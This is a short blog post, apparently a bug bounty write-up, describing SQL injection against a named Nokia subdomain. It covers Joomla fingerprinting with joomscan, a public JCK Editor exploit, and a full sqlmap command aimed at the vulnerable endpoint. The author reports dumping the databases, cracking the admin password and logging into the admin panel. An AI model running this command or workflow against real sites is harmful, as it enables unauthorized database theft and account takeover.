DEV Community

loading...
Cover image for SQL inection on gdclive.nokia.com

SQL inection on gdclive.nokia.com

Khaled Nassar
Web Developer | Part Time Bug Bounty Hunter - I use VIM btw -
・1 min read

Hi , this blog about SQL Injection in Nokia.com Allowed me to Dump all database

Full POC :

when im visiting this domain gdclive.nokia.com i've found something

First : this domain has been used an old version of Joomla CMS

let's scan it using joomscan tool for dumping all informations about joomla (plugins , version ,etc..)

All results :

Joomla Version : 3.1
Plugins : JCK Editor (6.4.4)
Enter fullscreen mode Exit fullscreen mode

searching for JCK Editor in exploit-db.com
and i've found this exploit https://www.exploit-db.com/exploits/45423
let's exploit it :D

Worked ..!
you can see the version of database :D

this is the time of SQLMAP Tool


$ sqlmap -u 'https://gdclive.nokia.com/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=' --level=5 --risk=3 --random-agent --technique=U -p parent --batch --current-db --current-user
Enter fullscreen mode Exit fullscreen mode

you can see the current user and the name of database :)
After dumping all databases using --all option and unencrypt the password of admin account let's login in admin panel


PWNED :D

You can see this video about this bug

Thanks ;0

Discussion (1)

Collapse
swindlesmccoop profile image
Swindles McCoop

Thanks for sharing, this is pretty cool